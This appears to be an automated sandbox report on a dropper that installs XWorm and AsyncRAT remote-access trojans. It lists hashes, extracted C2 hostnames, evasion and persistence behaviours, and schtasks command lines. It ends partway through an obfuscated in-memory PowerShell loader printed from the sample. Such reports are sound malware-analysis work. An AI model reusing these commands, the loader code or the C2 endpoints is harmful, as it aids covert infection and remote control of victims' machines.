Analysis

max time kernel: 86s
max time network: 156s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240226-en locale:en-us os:windows10-2004-x64 system
submitted: 22-06-2024 05:33

Static task: static1
Behavioral task: behavioral1
Sample: Dropper.exe
Resource: win7-20240508-en
General

Target: Dropper.exe
Size: 1.4MB
MD5: 19b0c113a289ffdac673f5746be14b9d
SHA1: 5a6f5fa38916a6058c88d5f45fc37f89872c0cb9
SHA256: 24e5bb5ab34a162b750abc2d8a38a48afceee92fc256f2a2fc3ff49f327fbf4a
SHA512: 253d62161d97ad83ba272a1e749a8cbfda51bf7b2e2825d98e41039208fc22b1f91315a0e8c6ee84d3c6b4e6f2867bf64e7bb53bb77384ab6a3340338896806e
SSDEEP: 12288:w8w1hc0Q53LOAGkjwtBx5n4AYakafNh/2mPj/YDLm7GylDULvEd8oK/mngAmgIv:wjmwDtPjwuB
Malware Config

Extracted: xworm
C2: politics-fiber.gl.at.ply.gg:47430
Install_directory: %AppData%
install_file: $77-scchost.exe

Extracted: asyncrat
Default: environmental-blank.gl.at.ply.gg:25944
delay: 1
install: true
install_file: $77-aachost.exe
install_folder: %AppData%
Signatures

Detect Xworm Payload (2 IoCs)
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe | family_xworm
behavioral2/memory/3924-65-0x0000000000FD0000-0x0000000000FE2000-memory.dmp | family_xworm

Suspicious use of NtCreateUserProcessOtherParentProcess (1 IoC)
Processes: powershell.EXE
description | pid | process | target process
PID 4344 created 612 | 4344 | powershell.EXE | winlogon.exe

Async RAT payload (1 IoC)
resource | yara_rule
C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe | family_asyncrat
Checks BIOS information in registry (2 TTPs, 2 IoCs)
BIOS information is often read in order to detect sandboxing environments.
Processes: wmiprvse.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosDate | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion | wmiprvse.exe
Checks computer location settings (2 TTPs, 3 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
Processes: Dropper.exe, $77-sdchost.exe, $77-aachost.exe
description | ioc | process
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | Dropper.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | $77-sdchost.exe
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | $77-aachost.exe
Executes dropped EXE (9 IoCs)
Processes: $77-sdchost.exe, $77-aachost.exe, $77-penisballs.exe, $77-install.exe, $77-scchost.exe
pid | process
3924 | $77-sdchost.exe
1428 | $77-aachost.exe
3408 | $77-penisballs.exe
4936 | $77-install.exe
2884 | $77-aachost.exe
2348 | $77-sdchost.exe
508 | $77-aachost.exe
3484 | $77-penisballs.exe
6112 | $77-scchost.exe

Adds Run key to start application (2 TTPs, 1 IoC)
Processes: $77-sdchost.exe
description | ioc | process
Set value (str) | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$77-scchost = "C:\\Users\\Admin\\AppData\\Roaming\\$77-scchost.exe" | $77-sdchost.exe

Checks installed software on the system (1 TTP)
Looks up Uninstall key entries in the registry to enumerate software on the system.

Legitimate hosting services abused for malware hosting/C2 (1 TTP, 3 IoCs)
Drops file in System32 directory (18 IoCs)
Processes: svchost.exe, powershell.EXE, $77-aachost.exe, OfficeClickToRun.exe, $77-sdchost.exe, $77-penisballs.exe
description | ioc | process
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Work | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Wake To Work | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\E2C6CBAF0AF08CF203BA74BF0D0AB6D5_0FB9553B978E7F00C6B2309507DEB64A | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive | powershell.EXE
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe | $77-aachost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\$77-aachost.exe.log | $77-aachost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\57C8EDB95DF3F0AD4EE2DC2B8CFD4157 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\FB0D848F74F70BB2EAA93746D24D9749 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Office\16.0\officeclicktorun.exe_Rules.xml | OfficeClickToRun.exe
File opened for modification | C:\Windows\System32\Winevt\Logs\Microsoft-Windows-Security-Mitigations%4UserMode.evtx | svchost.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Scan | svchost.exe
File created | C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe | $77-sdchost.exe
File opened for modification | C:\Windows\System32\Tasks\Microsoft\Windows\UpdateOrchestrator\Schedule Maintenance Work | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\7423F88C7F265F0DEFC08EA88C3BDE45_AA1E8580D4EBC816148CE81268683776 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506 | svchost.exe
File opened for modification | C:\Windows\system32\config\systemprofile\AppData\Roaming\MyData\DataLogs.conf | $77-penisballs.exe
Suspicious use of SetThreadContext (1 IoC)
Processes: powershell.EXE
description | pid | process | target process
PID 4344 set thread context of 5048 | 4344 | powershell.EXE | dllhost.exe

Drops file in Windows directory (1 IoC)
Processes: TiWorker.exe
description | ioc | process
File opened for modification | C:\Windows\Logs\CBS\CBS.log | TiWorker.exe

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).
Checks SCSI registry key(s) (3 TTPs, 18 IoCs)
SCSI information is often read in order to detect sandboxing environments.
Processes: wmiprvse.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Service | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\DeviceDesc | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\FriendlyName | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000 | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000\LogConf | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\DISK&VEN_DADY&PROD_HARDDISK\4&215468A5&0&000000\LogConf | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CDROM&VEN_DADY&PROD_DADY_DVD-ROM\4&215468A5&0&010000 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\FriendlyName | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\HardwareID | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\CompatibleIDs | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\DeviceDesc | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\CompatibleIDs | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Mfg | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Service | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Mfg | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\HardwareID | wmiprvse.exe
Checks processor information in registry (2 TTPs, 12 IoCs)
Processor information is often read in order to detect sandboxing environments.
Processes: mousocoreworker.exe, wmiprvse.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | mousocoreworker.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key security queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | wmiprvse.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | mousocoreworker.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Platform Specific Field 1 | mousocoreworker.exe
Delays execution with timeout.exe (2 IoCs)
Processes: timeout.exe
pid | process
4640 | timeout.exe
5968 | timeout.exe

Enumerates system info in registry (2 TTPs, 3 IoCs)
Processes: wmiprvse.exe, mousocoreworker.exe
description | ioc | process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | wmiprvse.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | mousocoreworker.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | mousocoreworker.exe
Modifies data under HKEY_USERS (64 IoCs)
Modifies registry class (64 IoCs)
Scheduled Task/Job: Scheduled Task 1 TTPs 4 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
Processes:
- 3908 schtasks.exe
- 2936 schtasks.exe
- 5464 schtasks.exe
- 5732 schtasks.exe
Suspicious behavior: AddClipboardFormatListener 2 IoCs
Processes:
- 3428 Explorer.EXE
- 3428 Explorer.EXE
Suspicious behavior: EnumeratesProcesses 64 IoCs
Processes:
$77-aachost.exe$77-penisballs.exepowershell.EXEpid process 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 1428 $77-aachost.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 4344 powershell.EXE 4344 powershell.EXE 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe 3408 $77-penisballs.exe -
Suspicious behavior: GetForegroundWindowSpam 2 IoCs
Processes:
- 3408 $77-penisballs.exe
- 3428 Explorer.EXE
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
$77-sdchost.exe$77-penisballs.exe$77-aachost.exepowershell.EXEdllhost.exe$77-aachost.exe$77-sdchost.exedwm.exesvchost.exesvchost.exe$77-penisballs.exesvchost.exedescription pid process Token: SeDebugPrivilege 3924 $77-sdchost.exe Token: SeDebugPrivilege 3408 $77-penisballs.exe Token: SeDebugPrivilege 1428 $77-aachost.exe Token: SeDebugPrivilege 3924 $77-sdchost.exe Token: SeDebugPrivilege 4344 powershell.EXE Token: SeDebugPrivilege 4344 powershell.EXE Token: SeDebugPrivilege 5048 dllhost.exe Token: SeDebugPrivilege 2884 $77-aachost.exe Token: SeDebugPrivilege 2348 $77-sdchost.exe Token: SeShutdownPrivilege 1016 dwm.exe Token: SeCreatePagefilePrivilege 1016 dwm.exe Token: SeAuditPrivilege 2628 svchost.exe Token: SeAuditPrivilege 2628 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2704 svchost.exe Token: SeIncreaseQuotaPrivilege 2704 svchost.exe Token: SeSecurityPrivilege 2704 svchost.exe Token: SeTakeOwnershipPrivilege 2704 svchost.exe Token: SeLoadDriverPrivilege 2704 svchost.exe Token: SeSystemtimePrivilege 2704 svchost.exe Token: SeBackupPrivilege 2704 svchost.exe Token: SeRestorePrivilege 2704 svchost.exe Token: SeShutdownPrivilege 2704 svchost.exe Token: SeSystemEnvironmentPrivilege 2704 svchost.exe Token: SeUndockPrivilege 2704 svchost.exe Token: SeManageVolumePrivilege 2704 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2704 svchost.exe Token: SeIncreaseQuotaPrivilege 2704 svchost.exe Token: SeSecurityPrivilege 2704 svchost.exe Token: SeTakeOwnershipPrivilege 2704 svchost.exe Token: SeLoadDriverPrivilege 2704 svchost.exe Token: SeSystemtimePrivilege 2704 svchost.exe Token: SeBackupPrivilege 2704 svchost.exe Token: SeRestorePrivilege 2704 svchost.exe Token: SeShutdownPrivilege 2704 svchost.exe Token: SeSystemEnvironmentPrivilege 2704 svchost.exe Token: SeUndockPrivilege 2704 svchost.exe Token: SeManageVolumePrivilege 2704 svchost.exe Token: SeDebugPrivilege 3484 $77-penisballs.exe Token: SeAuditPrivilege 2240 svchost.exe Token: SeAuditPrivilege 2628 
svchost.exe Token: SeAuditPrivilege 2628 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2704 svchost.exe Token: SeIncreaseQuotaPrivilege 2704 svchost.exe Token: SeSecurityPrivilege 2704 svchost.exe Token: SeTakeOwnershipPrivilege 2704 svchost.exe Token: SeLoadDriverPrivilege 2704 svchost.exe Token: SeSystemtimePrivilege 2704 svchost.exe Token: SeBackupPrivilege 2704 svchost.exe Token: SeRestorePrivilege 2704 svchost.exe Token: SeShutdownPrivilege 2704 svchost.exe Token: SeSystemEnvironmentPrivilege 2704 svchost.exe Token: SeUndockPrivilege 2704 svchost.exe Token: SeManageVolumePrivilege 2704 svchost.exe Token: SeAssignPrimaryTokenPrivilege 2704 svchost.exe Token: SeIncreaseQuotaPrivilege 2704 svchost.exe Token: SeSecurityPrivilege 2704 svchost.exe Token: SeTakeOwnershipPrivilege 2704 svchost.exe Token: SeLoadDriverPrivilege 2704 svchost.exe Token: SeSystemtimePrivilege 2704 svchost.exe Token: SeBackupPrivilege 2704 svchost.exe Token: SeRestorePrivilege 2704 svchost.exe Token: SeShutdownPrivilege 2704 svchost.exe Token: SeSystemEnvironmentPrivilege 2704 svchost.exe Token: SeUndockPrivilege 2704 svchost.exe -
Suspicious use of FindShellTrayWindow 1 IoCs
Processes:
- 3428 Explorer.EXE
Suspicious use of SetWindowsHookEx 8 IoCs
Processes:
- 3408 $77-penisballs.exe
- 3484 $77-penisballs.exe
- 3428 Explorer.EXE
- 3428 Explorer.EXE
- 3428 Explorer.EXE
- 3428 Explorer.EXE
- 3428 Explorer.EXE
- 3428 Explorer.EXE
Suspicious use of UnmapMainImage 1 IoCs
Processes:
- 3428 Explorer.EXE
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
Dropper.execmd.exe$77-sdchost.exe$77-aachost.execmd.execmd.exepowershell.EXEdllhost.exe$77-aachost.exelsass.execmd.exedescription pid process target process PID 1072 wrote to memory of 4896 1072 Dropper.exe cmd.exe PID 1072 wrote to memory of 4896 1072 Dropper.exe cmd.exe PID 1072 wrote to memory of 4896 1072 Dropper.exe cmd.exe PID 4896 wrote to memory of 4720 4896 cmd.exe curl.exe PID 4896 wrote to memory of 4720 4896 cmd.exe curl.exe PID 4896 wrote to memory of 4720 4896 cmd.exe curl.exe PID 1072 wrote to memory of 3924 1072 Dropper.exe $77-sdchost.exe PID 1072 wrote to memory of 3924 1072 Dropper.exe $77-sdchost.exe PID 1072 wrote to memory of 1428 1072 Dropper.exe $77-aachost.exe PID 1072 wrote to memory of 1428 1072 Dropper.exe $77-aachost.exe PID 1072 wrote to memory of 3408 1072 Dropper.exe $77-penisballs.exe PID 1072 wrote to memory of 3408 1072 Dropper.exe $77-penisballs.exe PID 1072 wrote to memory of 4936 1072 Dropper.exe $77-install.exe PID 1072 wrote to memory of 4936 1072 Dropper.exe $77-install.exe PID 1072 wrote to memory of 4936 1072 Dropper.exe $77-install.exe PID 3924 wrote to memory of 3908 3924 $77-sdchost.exe schtasks.exe PID 3924 wrote to memory of 3908 3924 $77-sdchost.exe schtasks.exe PID 1428 wrote to memory of 1388 1428 $77-aachost.exe cmd.exe PID 1428 wrote to memory of 1388 1428 $77-aachost.exe cmd.exe PID 1428 wrote to memory of 2188 1428 $77-aachost.exe cmd.exe PID 1428 wrote to memory of 2188 1428 $77-aachost.exe cmd.exe PID 1388 wrote to memory of 2936 1388 cmd.exe schtasks.exe PID 1388 wrote to memory of 2936 1388 cmd.exe schtasks.exe PID 2188 wrote to memory of 4640 2188 cmd.exe timeout.exe PID 2188 wrote to memory of 4640 2188 cmd.exe timeout.exe PID 2188 wrote to memory of 2884 2188 cmd.exe $77-aachost.exe PID 2188 wrote to memory of 2884 2188 cmd.exe $77-aachost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 
4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 4344 wrote to memory of 5048 4344 powershell.EXE dllhost.exe PID 5048 wrote to memory of 612 5048 dllhost.exe winlogon.exe PID 5048 wrote to memory of 668 5048 dllhost.exe lsass.exe PID 5048 wrote to memory of 940 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1016 5048 dllhost.exe dwm.exe PID 5048 wrote to memory of 396 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1044 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1116 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1124 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1140 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1148 5048 dllhost.exe svchost.exe PID 2884 wrote to memory of 3636 2884 $77-aachost.exe cmd.exe PID 2884 wrote to memory of 3636 2884 $77-aachost.exe cmd.exe PID 668 wrote to memory of 2668 668 lsass.exe sysmon.exe PID 5048 wrote to memory of 1224 5048 dllhost.exe svchost.exe PID 668 wrote to memory of 2668 668 lsass.exe sysmon.exe PID 5048 wrote to memory of 1308 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1332 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1372 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1416 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1576 5048 dllhost.exe svchost.exe PID 3636 wrote to memory of 2652 3636 cmd.exe curl.exe PID 3636 wrote to memory of 2652 3636 cmd.exe curl.exe PID 668 wrote to memory of 2668 668 lsass.exe sysmon.exe PID 5048 wrote to memory of 1596 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1652 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1696 5048 dllhost.exe svchost.exe PID 5048 wrote to memory of 1724 5048 dllhost.exe svchost.exe PID 
5048 wrote to memory of 1772 5048 dllhost.exe svchost.exe PID 668 wrote to memory of 2668 668 lsass.exe sysmon.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes (process tree: [N] is the nesting depth, cmd: is the recorded command line)
- [1] C:\Windows\system32\winlogon.exe  cmd: winlogon.exe
  - [2] C:\Windows\system32\dwm.exe  cmd: "dwm.exe"
    - Suspicious use of AdjustPrivilegeToken
  - [2] C:\Windows\System32\dllhost.exe  cmd: C:\Windows\System32\dllhost.exe /Processid:{903f9ed0-271d-4fa2-9c9f-890a96010122}
    - Modifies data under HKEY_USERS
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    - [3] C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\$77-sdchost.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
      - [4] C:\Windows\System32\schtasks.exe  cmd: "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "$77-scchost" /tr "C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-scchost.exe"
        - Scheduled Task/Job: Scheduled Task
        - [5] C:\Windows\System32\Conhost.exe  cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
    - [3] C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\$77-aachost.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - [4] C:\Windows\System32\cmd.exe  cmd: "C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"' & exit
        - [5] C:\Windows\System32\Conhost.exe  cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        - [5] C:\Windows\system32\schtasks.exe  cmd: schtasks /create /f /sc onlogon /rl highest /tn "$77-aachost" /tr '"C:\Windows\system32\config\systemprofile\AppData\Roaming\$77-aachost.exe"'
          - Scheduled Task/Job: Scheduled Task
      - [4] C:\Windows\system32\cmd.exe  cmd: C:\Windows\system32\cmd.exe /c ""C:\Windows\TEMP\tmp7F0E.tmp.bat""
        - Modifies data under HKEY_USERS
        - [5] C:\Windows\System32\Conhost.exe  cmd: \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        - [5] C:\Windows\system32\timeout.exe  cmd: timeout 3
          - Delays execution with timeout.exe
    - [3] C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe  cmd: "C:\Users\Admin\AppData\Local\Temp\$77-penisballs.exe"
      - Executes dropped EXE
      - Drops file in System32 directory
      - Modifies data under HKEY_USERS
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious use of SetWindowsHookEx
- [1] C:\Windows\system32\lsass.exe  cmd: C:\Windows\system32\lsass.exe
  - Suspicious use of WriteProcessMemory
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k DcomLaunch -p -s LSM
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s gpsvc
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s lmhosts
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s TimeBrokerSvc
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s NcbService
- [1] C:\Windows\System32\svchost.exe  cmd: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s EventLog
  - Drops file in System32 directory
- [1] C:\Windows\system32\svchost.exe  cmd: C:\Windows\system32\svchost.exe -k netsvcs -p -s Schedule
  - Drops file in System32 directory
  - [2] C:\Windows\system32\taskhostw.exe  cmd: taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXEC:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:KheAFTgcWVjf{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$wQHPWKZNqUmUHS,[Parameter(Position=1)][Type]$FfDLwCFLwj)$CNoGlYvJxaa=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName('R'+'e'+''+'f'+''+[Char](108)+'ec'+'t'+''+[Char](101)+'d'+[Char](68)+''+'e'+'le'+'g'+''+'a'+'t'+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'Memor'+[Char](121)+''+[Char](77)+''+[Char](111)+''+'d'+''+[Char](117)+''+[Char](108)+''+[Char](101)+'',$False).DefineType(''+[Char](77)+'y'+'D'+'e'+'l'+''+'e'+''+[Char](103)+''+'a'+''+[Char](116)+''+'e'+''+[Char](84)+''+'y'+'p'+[Char](101)+'',''+[Char](67)+'l'+[Char](97)+'s'+[Char](115)+','+'P'+'u'+[Char](98)+'li'+'c'+','+[Char](83)+''+[Char](101)+'a'+[Char](108)+'ed,'+[Char](65)+''+[Char](110)+''+[Char](115)+'iC'+[Char](108)+''+[Char](97)+''+[Char](115)+''+'s'+''+','+''+'A'+''+[Char](117)+'t'+'o'+'C'+'l'+''+'a'+'s'+[Char](115)+'',[MulticastDelegate]);$CNoGlYvJxaa.DefineConstructor(''+[Char](82)+''+'T'+''+[Char](83)+''+[Char](112)+''+'e'+''+[Char](99)+''+[Char](105)+'a'+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+''+[Char](44)+''+'H'+''+[Char](105)+''+'d'+''+[Char](101)+''+'B'+''+[Char](121)+''+[Char](83)+''+'i'+''+[Char](103)+''+[Char](44)+'P'+'u'+''+[Char](98)+'l'+[Char](105)+''+[Char](99)+'',[Reflection.CallingConventions]::Standard,$wQHPWKZNqUmUHS).SetImplementationFlags('R'+[Char](117)+'n'+'t'+'i'+[Char](109)+''+[Char](101)+''+[Char](44)+''+'M'+''+'a'+''+[Char](110)+'ag'+'e'+''+[Char](100)+'');$CNoGlYvJxaa.DefineMethod(''+[Char](73)+'